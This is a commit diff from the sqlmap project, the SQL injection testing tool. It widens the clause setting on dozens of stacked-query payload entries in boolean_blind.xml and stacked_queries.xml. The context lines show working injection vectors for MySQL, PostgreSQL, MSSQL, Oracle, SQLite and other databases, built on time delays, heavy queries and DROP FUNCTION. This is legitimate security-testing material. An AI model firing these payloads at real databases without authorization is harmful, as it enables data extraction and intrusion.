PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-20 14:39:02 +00:00
Code Issues Projects Releases Wiki Activity

Cleaning a mess with stacked queries and pre-WHERE boundaries

Browse Source
This commit is contained in:
Miroslav Stampar
2018-09-14 10:30:58 +02:00
parent a5e3dce26f
commit 35d9ed8476
6 changed files with 89 additions and 49 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
xml/payloads/boolean_blind.xml
View File

@@ -1386,7 +1386,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@@ -1407,7 +1407,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@@ -1428,7 +1428,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request>
@@ -1449,7 +1449,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request>
@@ -1469,7 +1469,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request>
@@ -1491,7 +1491,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>
<request>
@@ -1513,7 +1513,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request>
@@ -1533,7 +1533,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IIF([INFERENCE],1,1/0)</vector>
<request>
@@ -1553,7 +1553,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request>

68
xml/payloads/stacked_queries.xml
View File

@@ -7,7 +7,7 @@
<stype>4</stype>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -28,7 +28,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -48,7 +48,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -69,7 +69,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -89,7 +89,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -109,7 +109,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -128,7 +128,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -149,7 +149,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -169,7 +169,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -189,7 +189,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -208,7 +208,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -230,7 +230,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -251,7 +251,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@@ -273,7 +273,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@@ -294,7 +294,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@@ -314,7 +314,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@@ -333,7 +333,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@@ -353,7 +353,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@@ -372,7 +372,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@@ -392,7 +392,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@@ -411,7 +411,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@@ -431,7 +431,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -489,7 +489,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -510,7 +510,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -530,7 +530,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@@ -551,7 +551,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@@ -610,7 +610,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@@ -631,7 +631,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@@ -651,7 +651,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@@ -672,7 +672,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>